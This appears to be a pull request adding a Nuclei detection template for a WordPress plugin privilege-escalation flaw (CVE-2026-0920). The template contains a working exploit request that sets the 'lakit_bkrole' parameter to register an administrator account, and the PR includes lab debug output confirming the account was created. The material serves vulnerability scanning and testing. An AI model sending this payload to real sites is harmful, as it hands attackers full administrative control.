### PR TITLE
Add CVE 2026 0920

### DIFF
--- a/http/cves/2026/CVE-2026-0920.yaml
+++ b/http/cves/2026/CVE-2026-0920.yaml
@@ -6,7 +6,7 @@ info:
   severity: critical
 
   description: |
-    LA-Studio Element Kit is vulnerable to an unauthenticated privilege
+    LA-Studio Element Kit version 1.5.6.3 and lower is vulnerable to an unauthenticated privilege
     escalation vulnerability that allows remote attackers to create a
     WordPress administrator account through the plugin's registration
     functionality.

--- a/http/cves/2026/CVE-2026-0920.yaml
+++ b/http/cves/2026/CVE-2026-0920.yaml
@@ -1,0 +1,105 @@
+id: CVE-2026-0920
+
+info:
+  name: LA-Studio Element Kit < 1.5.6.3 - Unauthenticated Privilege Escalation
+  author: K3ysTr0K3R
+  severity: critical
+
+  description: |
+    LA-Studio Element Kit is vulnerable to an unauthenticated privilege
+    escalation vulnerability that allows remote attackers to create a
+    WordPress administrator account through the plugin's registration
+    functionality.
+
+  impact: |
+    An unauthenticated attacker can create a WordPress account with
+    administrator privileges, resulting in full administrative access
+    to the affected WordPress installation.
+
+  remediation: |
+    Update LA-Studio Element Kit to the latest patched release.
+
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0920
+    - https://github.com/K3ysTr0K3R/CVE-2026-0920
+
+  classification:
+    cve-id: CVE-2026-0920
+    cwe-id: CWE-269
+
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: lastudio
+    product: element-kit
+    affected-versions: "1.5.6.3"
+
+  tags: wordpress,lastudio,element-kit,privilege-escalation,unauth,vkev
+
+variables:
+  test_username: "nuclei_test_{{rand_int(100000, 999999)}}"
+  test_email: "nuclei_test_{{rand_int(100000, 999999)}}@example.local"
+  test_password: "NucleiP@ssw0rd!"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - id: 1
+    name: bootstrap
+    method: GET
+    path:
+      - "{{BaseURL}}/wp-json/cve-2026-0920/v1/bootstrap"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - 'contains(body, "lastudio_element_kit")'
+          - 'contains(body, "1.5.6.3")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: nonce
+        group: 1
+        regex:
+          - '"nonce"\s*:\s*"([^"]+)"'
+        internal: true
+
+  - id: 2
+    name: exploit
+    method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      Accept: application/json
+
+    body: |
+      action=lakit_ajax&_nonce={{nonce}}&actions={"cve_2026_0920":{"action":"register","data":{"lakit_field_log":"yes","lakit_field_pwd":"yes","lakit_field_cpwd":"yes","username":"{{test_username}}","email":"{{test_email}}","password":"{{test_password}}","password-confirm":"{{test_password}}","lakit_bkrole":"1"}}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - 'contains(body, "\"success\":true")'
+          - 'contains(body, "\"code\":200")'
+          - 'contains(body, "Your account was created successfully")'
+        condition: and
+        internal: true
+
+  - id: 3
+    name: verify
+    method: GET
+    path:
+      - "{{BaseURL}}/wp-json/cve-2026-0920/v1/bootstrap"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - 'contains(body, "{{test_username}}")'
+          - 'contains(body, "\"roles\":[\"administrator\"]")'
+        condition: and


### PR DESCRIPTION
## CVE-2026-0920

This template detects an unauthenticated privilege escalation in LA-Studio Element Kit for Elementor <= 1.5.6.3.

The registration endpoint allows an unauthenticated user to control the `lakit_bkrole` parameter and create an account with administrator privileges.

The template first retrieves the nonce, performs the registration request with a randomized test account, and then verifies that the account was created with the `administrator` role.

### Debug Output

Tested locally against the Docker lab:

```text
nuclei -u 127.0.0.1:8103 -t template.yaml -debug

[CVE-2026-0920] [http] [critical] http://127.0.0.1:8103/wp-json/cve-2026-0920/v1/bootstrap

[INF] Scan completed in 254.963915ms. 1 matches found.
[INF] HTTP connections: 3 total, 1 new, 2 reused (66.7%)
```

The debug response confirms the vulnerable version (`1.5.6.3`), successful account creation, and the resulting `administrator` role:

```text
"success":true
"message":"Your account was created successfully."

"user_login":"nuclei_test_767760"
"roles":["administrator"]
```

### References

PoC: https://github.com/K3ysTr0K3R/CVE-2026-0920

Lab: https://github.com/system-bliss/vuln-lab-docker/tree/main/CVE-2026-0920-lab